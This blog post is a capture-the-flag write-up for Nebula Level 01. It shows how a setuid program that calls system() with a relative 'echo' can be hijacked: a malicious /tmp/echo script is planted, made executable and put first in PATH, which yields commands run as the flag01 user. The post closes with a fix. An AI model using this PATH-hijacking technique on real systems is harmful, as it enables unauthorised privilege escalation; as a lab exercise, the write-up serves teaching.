blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 01

Problem

  1. Using functions that are known to be vulnerable!
  2. Read the manual!

The given program uses the internal function system(const char *command); to execute a command. Refering to www.gnu.org this function uses /bin/sh -c to execute the given command. If a relative name is used, /bin/sh -c searches within the paths - given by the environment-variable PATH - for a command that matches that name. That means one can modify the PATH-variable, and executes its own implementation of the relative command. This custom command can be a shellscript or a binary.

Exploit

Note line 17 from the code.

1
2
3
...
17 system("/usr/bin/env echo and now what?");
...

It uses system(const char *command); to execute the command /usr/bin/env echo and now what?. One can edit the environment-variable PATH, and run his own echo. Create the file /tmp/echo and write the following content to it.

1
2
#!/bin/bash
getflag

In addition make the file executable and edit the PATH-variable:

1
2
chmod +x /tmp/echo
PATH=/tmp:${PATH}

Executing the command leads us to the flag.

1
/home/flag01/flag01

Note

You can add any commands to the shellscript - they will be run as user flag01.

Lesson / How to Fix

  1. Do not use functions that are known to be vurlnerable! Using absolute paths will not help either – see linux.die.net, section Notes for more details.
  2. Read the manual! As this wargame will show on other levels too, reading the documentation of used functions is essential if one wants to programm with security in mind.

The intention of the program is not clear to me. A possible fix is using the function printf without using userinput, i.e. the fix string “/usr/bin/env echo and now what?”. Having userinput, leads to other problems like buffer-overflows or formatstring-overflows.


other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19